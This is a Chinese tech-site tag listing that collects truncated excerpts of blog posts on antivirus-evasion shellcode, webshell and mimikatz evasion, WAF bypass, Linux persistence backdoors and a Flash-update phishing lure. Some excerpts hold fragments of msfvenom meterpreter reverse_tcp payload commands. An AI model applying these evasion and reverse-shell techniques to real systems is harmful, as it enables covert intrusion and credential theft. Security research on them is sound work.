E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
免杀Shellcode
【安全研究】Linux后渗透常见后门驻留方式分析
又或者,在RedTeam拿下一台服务器,为达到长久控制的目的而专门定制持久化后门(
免杀
肯定是必须的)的前提下,他们会如何结合系统自身的某些特性,达到持久化控制的效果?
安全狗(safedog)
·
2023-09-29 07:55
安全研究
linux
免杀
对抗-无文件落地&分离拆分-文本提取+加载器分离+参数协议化+图片隐写
无文件落地&分离拆分无文件落地&分离拆分其实就是内存
免杀
,内存
免杀
是将
shellcode
直接加载进内存,由于没有文件落地,因此可以绕过文件扫描策略的查杀。
xiaoheizi安全
·
2023-09-27 10:52
免杀对抗
网络安全
python
安全
免杀
对抗-内存加载-
shellcode
转换-UUID+MAC+IPV4
内存加载-UUID地址-
ShellCode
转换介绍:通用唯一识别码(UUID),是用于计算机体系中以识别信息数目的一个128位标识符,根据标准方法生成,不依赖中央机构的注册和分配,UUID具有唯一性。
xiaoheizi安全
·
2023-09-27 10:16
免杀对抗
网络安全
安全
Golang基础之关键字
Type参考##https://blog.csdn.net/
SHELLCODE
_8BIT/article/details/122837699type有如下几种用法:定义结构体定义接口类型定义类型别名类型查询类型定义
叱咤少帅(少帅)
·
2023-09-26 22:42
Golang
go
免杀
技术,你需要学习哪些内容
免杀
技术,你需要学习哪些内容?什么是
免杀
?
免杀
是指通过各种技术手段使恶意软件或病毒能够逃避杀毒软件的检测和阻止,成功地感染目标系统。
自饰者六便士
·
2023-09-26 17:21
网络安全
学习
网络
安全
认识
ShellCode
1认识
SHELLCODE
shellcode
的本质其实就是一段可以自主运行的代码。
凌木LSJ
·
2023-09-25 15:33
Web安全
网络安全
系统安全
web安全
认识JSP webshell
免杀
【virustotal】【D盾】【shellpub】接下来进行
免杀
,
免杀
就是将这些被识别的特征进行替换,绕过,混淆和干扰。
凌木LSJ
·
2023-09-25 15:32
Web安全
java
servlet
网络安全
web安全
安全
WAF Bypass及案例实战
1.2.1WAF指纹识别工具1.3绕WAF的多种方式2.SQLiBypass2.1Bypass思路2.1.1层面问题2.1.2HTTP问题2.2绕过分析2.2.1绕过方式2.2.2脚本编写3.一句话木马
免杀
来日可期x
·
2023-09-25 03:20
WAF
网络安全
系统安全
安全
WAF绕过
免杀
对抗-java语言-
shellcode
免杀
-源码修改+打包exe
JAVA-
ShellCode
免杀
-源码修改&打包EXE
Shellcode
-生成/上线1.msf生成
shellcode
命令:msfvenom-pjava/meterpreter/reverse_tcpLHOST
xiaoheizi安全
·
2023-09-24 15:34
免杀对抗
java
网络安全
免杀
对抗-PowerShell-混淆+分离
演示:PowerShell-生成和上线1.生成——启动cs,生成两种模式的powershell脚本文件模式:执行ps1文件上线命令模式:执行txt文件中的命令上线2.文件模式powershell执行——两种方法方法一:打开Win7以上自带的WindowsPowerShellISE来执行成功上线:方法二:打开命令行,启动PowerShell来执行命令:powershell命令:.\payload.p
xiaoheizi安全
·
2023-09-24 15:04
免杀对抗
安全
网络安全
免杀
对抗-C#+go语言-混淆+防反编译+分离
C#&NET-
ShellCode
-生成/上线一、生成:1.msf生成C#语言的
shellcode
命令:msfvenom-pwindows/x64/meterpreter/reverse_tcpLHOST
xiaoheizi安全
·
2023-09-24 15:03
免杀对抗
golang
网络安全
c#
恶意软件分析资料大合集
恶意软件集合匿名代理蜜罐恶意软件样本库开源威胁情报工具其他资源检测与分类在线扫描与沙盒域名分析浏览器恶意软件文档和
Shellcode
文件提取去混淆调试和逆向工程网络内存取证Windows神器存储和工作流杂项资源书籍
hacker鬼七
·
2023-09-24 10:21
网络
网络安全
web安全
安全
黑客圈专业术语总结
1.POC、EXP、Payload与
Shellcode
POC:全称’ProofofConcept',中文’概念验证’,常指一段漏洞证明的代码。
hacker鬼七
·
2023-09-24 09:51
web安全
安全
网络安全
网络
CS 4.7 Stager 逆向及
Shellcode
重写
1.概述一直很想有一个自己的控,奈何实力不允许,CS仍然是目前市面上最好用的控,但是也被各大厂商盯得很紧,通过加载器的方式进行
免杀
效果有限,后来看到有人用go重写了CS的beacon,感觉这个思路很好,
小袁同学爱学习
·
2023-09-24 07:02
单片机
stm32
嵌入式硬件
开发语言
python
数据库
服务器
Rust
免杀
Shellcode
加载与混淆2
前言这是半年前我学习Rust和
免杀
时的一些记录,最近打开知识库看到了这篇半年前的笔记,并且发现我常逛的安全社区都比较少有人分享Rust以及Rust
免杀
的帖子,于是想着将这篇笔记分享出来供大家参考和指正。
小袁同学爱学习
·
2023-09-24 06:23
rust
开发语言
后端
学习
python
数据分析
数据挖掘
pwn — ret2
shellcode
Ret2
shellcode
:按惯例检查保护,发现啥都没开用ida打开看main函数发现了gets和strncpy函数,将gets里的s的值存入了buf2题文中无system,无
shellcode
(据说是长成
YeeZi_
·
2023-09-24 03:16
Metasploit(二)
搜索带有0708字样的模块useexploit模块--使用模块showoptions–查看配置set…–设置配置check--漏洞检测(可省略)use–使用exploit模块攻击Metasploit生成
shellcode
echokp
·
2023-09-23 15:56
工具
扫描测试工具
网络安全(黑客技术)学习笔记
3.所需要的技术水平需要掌握的知识点偏多(举例):外围打点能力渗透漏洞挖掘流量分析代码审计逆向
免杀
4.国家政策环境对于国家与企业的地位愈发重要,没有网络安全就没有国
德西德西
·
2023-09-20 11:47
web安全
学习
笔记
网络安全
网络
安全
python
木马
免杀
之PE文件
对于此问题,打算开一个专题进行木马
免杀
的分析,先从最最重要的PE文件说起,要攻击Windows系统,如果不懂PE文件,面对杀毒软件,则只能束手就擒了。PE文件PE(PortableExec
无情剑客Burning
·
2023-09-20 03:40
渗透中 POC、EXP、Payload、
Shellcode
的区别
渗透中PoC、Exp、Payload、
Shellcode
的区别不同含义:POC=ProofofConcept中文意思是“观点证明”。
Bulldozer Coder
·
2023-09-20 02:36
安全
web安全
安全
POC
EXP
payload
shellcode
打开对方的电脑的摄像头
大家玩玩就好,有杀毒软件可能会被干掉,关于
免杀
方式有很多,请勿捉弄同学,谢谢msfvenom-pwindows/meterpreter/reverse_tcpLHOST=10.0.128.149LPORT
落幕_f94c
·
2023-09-19 14:39
Windows多种方式获取密码
后面一段时间直到hw结束,我打算把主要精力都放在
免杀
上面,不会点C真的寸步难行,或者就只能从go下手了0x01SSP记录明文密码SSP(SecuritySupportProvider)是一个用于实现身份验证的
book4yi
·
2023-09-19 08:11
免杀
对抗-Python-混淆算法+反序列化-打包生成器-Pyinstall
Python-MSF/CS生成
shellcode
-上线cs上线1.生成
shellcode
-c或者python2.打开pycharm工具,创建一个py文件,将原生态执行代码复制进去
shellcode
执行代码
xiaoheizi安全
·
2023-09-18 00:25
免杀对抗
python
算法
网络安全
【操作系统安全】_Win7&Win8系列提权漏洞
文章目录漏洞概述和复现复现环境复现过程管理员身份复现普通用户复现基础知识系统调用SSDT表和ShadowSSDT表和HalDispatchTable硬件抽象层调度表R3任意修改R0地址空间内存漏洞原理查看exp源代码漏洞分析利用漏洞写一段获取System进程令牌的
shellcode
区块链市场观察家
·
2023-09-17 01:08
学校课程
PowerShell脚本
免杀
/bypass/绕过杀毒软件,ReconFTW 漏洞扫描
PowerShell脚本
免杀
/bypass/绕过杀毒软件,ReconFTW漏洞扫描。
代码讲故事
·
2023-09-16 18:17
网络攻防
PowerShell
脚本
免杀
bypass
杀毒软件
漏洞扫描
ReconFTW
pwnable.kr之echo1
拖进IDA分析第一项选项对应的函数是echo1,该函数存在明显的栈溢出.echo1-2.JPGecho1-3.JPG如果checksec的话可以发现该elf缓解技术几乎没开,可以采用覆盖返回值+跳转到
shellcode
hyrathon
·
2023-09-15 09:56
ProcDump+Mimikatz绕过杀毒软件抓密码
Mimikatz就会被检测为病毒,无法使用,而想要对Mimikatz进行二次开发或者
免杀
难度会比较大,那有办法去解决这个问题吗?
Xuno_
·
2023-09-13 02:33
#
内网渗透
网络安全
安全
渗透测试
内网渗透
内网渗透作业2(mimikatz、pwdump/procdump/LaZagne/nmap)
欢迎大家一起来Hacking水友攻防实验室学习,渗透测试,代码审计,
免杀
逆向,实战分享,靶场靶机,求关注(mimikatz、pwdump/procdump/LaZagne/nmap)很紧张很“充实”的培训
热热的雨夜
·
2023-09-13 02:31
WEB渗透学习
windows
几种姿势运行mimikatz
但是在实际的运用中,常常会遇到杀软的拦截,所以这里我借鉴网上的资料,进行复现学习,达到
免杀
绕过的目的。有些方式没有复现成功我就没有写出来了,有一些成功之后似乎也会被拦截了。
小晓晓晓林
·
2023-09-13 02:29
内网渗透
mimikatz
Windows
密码抓取
内网渗透
2.12 PE结构:实现PE字节注入
本章笔者将介绍一种通过Metasploit生成
ShellCode
并将其注入到特定PE文件内的Shell注入技术。
微软技术分享
·
2023-09-12 03:41
《Visual
C++
安全编程技术实践》
《灰帽黑客:攻守道》
PE结构
微软技术
C++
Visual
C++
信息安全
免杀
对抗-
ShellCode
上线+回调编译执行+混淆变异算法
C/C++--
ShellCode
-
免杀
对抗介绍:
shellcode
是一段用于利用软件漏洞而执行的代码,
shellcode
为16进制的机器码,因为经常让攻击者获得shell而得名。
xiaoheizi安全
·
2023-09-11 10:48
免杀对抗
网络安全
我要学pwn.day12
ciscn_2019_n_5潜心修炼,从基础开始这是一道简单的编写
shellcode
解题流程1.查看文件$fileciscn_2019_n_5ciscn_2019_n_5:ELF64-bitLSBexecutable
名为逗比
·
2023-09-11 07:33
我要学pwn
信息安全
网络安全
记一次内网实战之不会
免杀
(上)
本文作者:重生信安-nobgr前段时间看了一下内网渗透,所以想找个环境练习一下,恰好有个兄弟丢了个站点出来,一起“练习内网”,然后就开始了“实战代练”。由于“懒”,所以记录时间和截图有些是补的。0x00外网入口点打开站点(这里用baidu.com替代)看了看,左翻翻右翻翻能看到很明显的“注入”点。简单测试一下(and1=1、1=2),返回不一样,所以sqlmap一把梭。sqlmap-uhttps:
重生信息安全
·
2023-09-10 15:24
Flash钓鱼->CS上线(
免杀
过火绒、360等)
先看结果访问钓鱼页面:点击立即升级即把马儿下载下来了这个马儿是rar压缩的,做成的rar解压自启动,所以是个exe的文件,然后这里为了像一点,把图标给改了双击运行,查看效果:首先CS是没东西的解压路径现在也是没东西的(这里我把解压路径给改成了:C:\Windows\Temp执行路径为:C:\Windows\Temp\Flash.exe)双击砸门的flash文件马尔已上线--------------
鸡肋是鸡肋!
·
2023-09-10 08:04
火绒安全
Python绝技:运用Python成为顶级黑客
Python绝技:运用Python成为顶级黑客结合具体的场景和真实的案例,详述了Python在渗透测试、电子取证、网络流量分析、无线安全、网站中信息的自动抓取、病毒
免杀
等领域内所发挥的巨大作用。
『六道』
·
2023-09-09 22:28
python
一款内网信息收集利用工具
FuckDomainMini简介这是一款基于java开发Windows的内网信息收集、利用工具可以节省您的信息收集所花费的,又或者是做
免杀
所花费的时间现在这个版本是先行版本,目前先行版只有一个功能,更多的功能还在调试与开发中
HACK之道
·
2023-09-09 17:40
安全工具
渗透测试
网络安全
web安全
红蓝对抗
信息安全
Python 源码混淆与加密
但在某些场景下,我们的源码是不想被别人看到的,例如开发商业软件、编写0day漏洞POC/EXP、
免杀
shellcode
等。多人学习python,不知道从何学起。
早起的python
·
2023-09-08 20:48
python
python编程
编程语言
ASCII码-
shellcode
的技巧
所以就简单记录一下工具怎么用吧https://github.com/TaQini/alpha3https://github.com/veritas501/ae64.githttps://github.com/rcx/
shellcode
_encoder
蚁景网络安全
·
2023-09-07 11:52
安全
网络安全
1.pwn基础总结
基本概念:●exploit●用于攻击的脚本与方案(通常缩写为exp)●payload●攻击载荷,是的目标进程被劫持控制流的数据●
shellcode
调用攻击目标的shell的代码(打开目标的shell),
爱码蔡蔡子
·
2023-09-04 08:05
PWN
linux
蓝队追踪者工具TrackAttacker,以及
免杀
马生成工具
蓝队追踪者工具TrackAttacker,以及
免杀
马生成工具。做过防守的都知道大HW时的攻击IP量,那么对于这些攻击IP若一个个去溯源则显得效率低下,如果有个工具可以对这些IP做批量初筛是不是更好?
代码讲故事
·
2023-09-03 19:02
网络攻防
TrackAttacker
免杀马
HW
木马
查杀
工具
追踪
【PWN · 栈迁移】[BUUCTF]ciscn_2019_es_2
第一道栈迁移题目,跌跌撞撞理解了前言当前溢出可用空间比较少时(极端情况下仅能覆写ebp和ret),可以通过栈迁移的方式,扩大
shellcode
的容纳空间,其核心是将esp移动到一段shellocode开头
Mr_Fmnwon
·
2023-09-03 16:19
【PWN
·
高级栈相关】
栈迁移
pwn
ctf
StackOverflow
1.12 进程注入
ShellCode
套接字
在笔者前几篇文章中我们一直在探讨如何利用Metasploit这个渗透工具生成
ShellCode
以及如何将
ShellCode
注入到特定进程内,本章我们将自己实现一个正向
ShellCode
Shell,当进程被注入后
微软技术分享
·
2023-09-02 03:00
《Visual
C++
安全编程技术实践》
《灰帽黑客:攻守道》
c++
远程软件
套接字
ShelllCode
信息安全
1.9 动态解密
ShellCode
反弹
利用动态解密执行技术可以实现
免杀
。当程序中使用了敏感的函数时,存在被杀的风险。通过将代码段中的代码进行加密,在需要时直
微软技术分享
·
2023-09-01 23:24
《灰帽黑客:攻守道》
《Visual
C++
安全编程技术实践》
汇编语言
Windows汇编
ShellCode
信息安全
C语言
mimikatz
免杀
过360和火绒
1、
免杀
方式对mimikatz我们进行源码
免杀
。源码
免杀
只需要定位源码中的特征代码进行修改就可以达到预期的
免杀
效果。一般的定位特征码分为三种:定位倒代码上
zxl2605
·
2023-08-30 23:50
工具的使用
web安全
1.6 编写双管道
ShellCode
此外,本文还将通过使用汇编语言一步步来实现这个可被注入的
ShellCode
后门,并以此提高代码通用性。最终,我们将通过一个实际的漏洞攻击场景来展示如何利用这个后门实现内存注入攻击。
微软技术分享
·
2023-08-30 15:11
《Visual
C++
安全编程技术实践》
《灰帽黑客:攻守道》
汇编语言
windows汇编
信息安全
ShellCode
匿名管道
shellcode
编写
文章目录注意事项基础知识开始编写第一步初始化第二步实现其他函数动态调用第三部实现GetProcAddress和LoadLibraryA的动态调用获取kernel32.dll基址动态调用GetProcAddress实战CreateFileAMessageBoxA导出
shellcode
天问_Herbert555
·
2023-08-29 13:50
二进制逆向
c++
开发语言
shellcode
汇编
3.2 定位
shellcode
1、代码植入实验的反思在代码植入实验中,我们使用越界的字符完成控制返回地址后,将返回地址改为
shellcode
在内存中的起始地址。
PT_silver
·
2023-08-29 13:50
0day安全
系统安全
编写windows的
shellcode
写windows的
shellcode
在很长时间是一件秘密的事。问题是,它不像Unix的
shellcode
,你没有已知的系统调用API。
DISDDSS
·
2023-08-29 13:50
笔记
ShellCode
原理以及编写
0x0
ShellCode
编写注意事原理1)不能使用字符串的直接偏移即使你在C/C++代码中定义一个全局变量,一个取值为“Helloworld”的字符串,或直接把该字符串作为参数传递给某个函数。
虚构之人
·
2023-08-29 13:49
免杀
汇编
c++
安全
信息安全
反病毒
动态定位API函数之
shellcode
编写
通用
shellcode
编写动态定位API背景:如果编写的
ShellCode
采用了硬编址的方式来调用相应的API函数,这会存在操作系统的版本不一样,调用函数在内存中的地址不同而出现失败的现象。
mdp1234
·
2023-08-29 13:49
网络安全
网络安全
安全漏洞
上一页
3
4
5
6
7
8
9
10
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他